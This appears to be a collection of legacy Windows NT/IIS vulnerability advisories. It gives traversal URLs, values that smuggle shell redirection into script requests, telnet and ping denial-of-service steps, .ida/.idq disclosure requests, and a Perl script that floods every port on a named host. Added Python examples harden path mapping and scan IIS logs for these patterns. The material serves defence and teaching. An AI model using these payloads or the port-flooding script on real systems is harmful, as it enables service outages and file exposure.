Affected systems: NT 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the web server's content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the 'Guest' user, or the IUSR_WWW account, has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: NT 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

The redirection works because the .bat/.cmd script mapping hands the decoded request path to the command interpreter, which honours '>' and line breaks like any other command line.
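The two behaviours above, the '..\..' escape from the content root and the '>' / %0A%0D redirection through a .bat script mapping, both come from mapping a URL onto the disk without checking it first. The following Python is an added example, not code from the original page: it models a naive mapping beside a hardened one on the page's own URLs. WEB_ROOT, the cmd.exe invocation string and the benign /default.htm request are assumptions.

```python
import ntpath
from urllib.parse import unquote

# Assumed content root of an early IIS install (an assumption for the example).
WEB_ROOT = r"C:\InetPub\wwwroot"

# Characters cmd.exe interprets when a .bat/.cmd script mapper passes the
# request path on the command line; CR and LF end the command.
SHELL_META = set("<>|&\r\n")


def naive_map(url_path):
    """Map a URL path onto the disk the way the text describes the early
    server doing it: URL-decode, turn '/' into '\\', append to the content
    root and let the file system collapse '..' components."""
    decoded = unquote(url_path).replace("/", "\\")
    return ntpath.normpath(WEB_ROOT + decoded)


def batch_command_line(url_path):
    """Command line a naive .bat script mapper would hand to cmd.exe
    (the 'cmd.exe /c' prefix is an assumption)."""
    return "cmd.exe /c " + naive_map(url_path)


def is_under(path, root):
    """True if the normalised path is root itself or lies beneath it."""
    root = ntpath.normpath(root).lower()
    path = ntpath.normpath(path).lower()
    return path == root or path.startswith(root + "\\")


def safe_map(url_path):
    """Hardened mapping: decode first, refuse shell metacharacters and any
    '..' component (whichever separator is used), then confirm the result
    is still under WEB_ROOT.  Returns None for a rejected request."""
    decoded = unquote(url_path)
    if SHELL_META & set(decoded):
        return None
    if ".." in decoded.replace("\\", "/").split("/"):
        return None
    mapped = ntpath.normpath(WEB_ROOT + decoded.replace("/", "\\"))
    if not is_under(mapped, WEB_ROOT):
        return None
    return mapped


if __name__ == "__main__":
    for url in ("/default.htm", "/..\\..", "/scripts..\\..\\scriptname",
                "/scripts/exploit.bat>PATH\\target.bat",
                "/scripts/script_name%0A%0D>PATH\\target.bat"):
        print(f"{url!r:48} naive={naive_map(url)!r}  safe={safe_map(url)!r}")
```

The naive mapper turns '/..\..' into the drive root, so every file the anonymous account can read is reachable; the hardened one decodes before it checks, which is what stops %0A%0D from slipping past a check done on the raw URL.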
----------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your system (Perl is available from the NT Resource Kit):
/*begin poke code*/

#!/usr/bin/perl
# poke: connect to every TCP port on a host and send about ten characters
# followed by a <CR>, as in the telnet steps above.
# Edited here to use IO::Socket::INET (shipped with Perl) in place of the
# chat2.pl library the original required; the behaviour is otherwise the same.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";
my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # skip the known problem ports (53, 135, 1031)

# The original started the loop at $0 (the script name), which is a bug;
# start at port 1.
for (my $port = 1; $port < 65535; $port++) {
    next if $knownports && ($port == 53 || $port == 135 || $port == 1031);

    print "Trying port: $port\n" if $verbose;

    my $fh = IO::Socket::INET->new(PeerAddr => $systemname,
                                   PeerPort => $port,
                                   Proto    => 'tcp',
                                   Timeout  => 2)
        or next;   # closed or filtered port: nothing to poke

    $fh->print("This is about ten characters or more\r\n");
    $fh->close;
}

/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0

Using a telnet application to connect to a web server on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0

Large-packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
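Added example (not from the original page) of why the 65527-byte ping above is a problem: IPv4 carries a 16-bit total length, so a datagram whose fragments reassemble past 65535 bytes overruns a receiver that sized its reassembly buffer from that field. The code builds the ICMP echo request, fragments it as a sender's stack would and computes the size the receiver ends up with. The Ethernet MTU and the ICMP identifier/sequence values are assumptions, and nothing is sent on the wire.

```python
import struct

IP_HDR_LEN = 20        # IPv4 header without options
MAX_DATAGRAM = 65535   # 16-bit IPv4 total-length field
MTU = 1500             # Ethernet; an assumption for the example


def inet_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_echo(payload, ident=1, seq=1):
    """ICMP echo request (type 8, code 0) with a valid checksum;
    ident/seq are assumed values."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = inet_checksum(hdr + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def fragment(ip_payload, mtu=MTU):
    """Split an IP payload into fragments as a sending stack would: every
    non-final fragment carries a multiple of 8 bytes, and the offset field
    counts 8-byte units (13 bits, so at most 8191 = 65528 bytes).
    Returns a list of (offset, more_fragments, chunk)."""
    per_frag = (mtu - IP_HDR_LEN) // 8 * 8
    frags = []
    for start in range(0, len(ip_payload), per_frag):
        chunk = ip_payload[start:start + per_frag]
        more = start + len(chunk) < len(ip_payload)
        offset = start // 8
        if offset > 0x1FFF:
            raise ValueError("fragment offset does not fit in 13 bits")
        frags.append((offset, more, chunk))
    return frags


def reassembled_length(frags):
    """Total datagram length a receiver derives from the final fragment:
    IP header + offset*8 + that fragment's payload.  Anything above
    MAX_DATAGRAM cannot be represented in the total-length field and
    overruns a buffer sized from it."""
    offset, _more, chunk = max(frags, key=lambda f: f[0])
    return IP_HDR_LEN + offset * 8 + len(chunk)


def ping_length(data_len):
    """Length the datagram from 'PING -l <data_len>' reassembles to."""
    return reassembled_length(fragment(icmp_echo(b"\x00" * data_len)))


def is_ping_of_death(data_len):
    return ping_length(data_len) > MAX_DATAGRAM


if __name__ == "__main__":
    for n in (32, 65500, 65527):
        print(f"-l {n}: reassembles to {ping_length(n)} bytes,"
              f" oversize={is_ping_of_death(n)}")
```

The 65527 data bytes plus the 8-byte ICMP header already fill the 65535-byte maximum, so the 20-byte IP header pushes the reassembled datagram to 65555 bytes; every fragment on its own is a legal packet, which is why a stack that only validates individual fragments does not notice until reassembly.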
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long" or "Cannot find the specified path". The other is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and of the directory structure of the server.
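To hunt for the requests in these notes in IIS logs (the '..\..' and 'GET ../..' traversals, the '>' and %0A%0D redirection into the scripts directory, and the .ida/.idq path-disclosure and overlong-URL requests), the following added example, not from the original page, runs a few rules over constructed W3C extended log lines. The log lines, client addresses, timestamps and the 1024-byte 'overlong' threshold are all assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C extended log lines (date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status); addresses and times are made up for the example.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "1999-01-04 10:00:01 10.0.0.7 GET /default.htm - 200",
    "1999-01-04 10:00:02 10.0.0.9 GET /..\\.. - 200",
    "1999-01-04 10:00:03 10.0.0.9 GET /scripts/exploit.bat>c:\\target.bat - 502",
    "1999-01-04 10:00:04 10.0.0.9 GET /scripts/script_name%0A%0D>c:\\target.bat - 502",
    "1999-01-04 10:00:05 10.0.0.9 GET ../.. - 400",
    "1999-01-04 10:00:06 10.0.0.11 GET /anything.idq - 200",
    "1999-01-04 10:00:07 10.0.0.11 GET /" + "." * 25000 + "ida - 500",
]

OVERLONG = 1024   # assumed threshold; the .ida crash in the text used ~25kb


def classify(stem):
    """Return the names of the rules a URI stem trips, after URL-decoding
    so that %0A%0D and %2E%2E are seen for what they are."""
    decoded = unquote(stem)
    hits = []
    if ".." in decoded.replace("\\", "/").split("/"):
        hits.append("traversal")          # ..\.. or ../.. component
    if any(c in decoded for c in "<>|&"):
        hits.append("shell-redirect")     # cmd.exe redirection/pipe
    if "\r" in decoded or "\n" in decoded:
        hits.append("crlf")               # line break ends the command
    if re.search(r"\.id[aq]$", decoded, re.IGNORECASE):
        hits.append("idq-ida")            # path disclosure via indexing DLL
    if len(decoded) > OVERLONG:
        hits.append("overlong")           # the .ida DoS shape
    return hits


def scan(lines):
    """Return (c-ip, stem excerpt, rules) for every flagged request."""
    flagged = []
    for line in lines:
        if line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        c_ip, stem = fields[2], fields[4]
        hits = classify(stem)
        if hits:
            flagged.append((c_ip, stem[:40], hits))
    return flagged


if __name__ == "__main__":
    for c_ip, stem, hits in scan(SAMPLE_LOG):
        print(f"{c_ip:10} {','.join(hits):24} {stem}")
```

Decoding before matching matters: a rule that looks for a literal '>' or '..' in the raw field misses %3E and %2E%2E, and the server itself decoded before acting on the request.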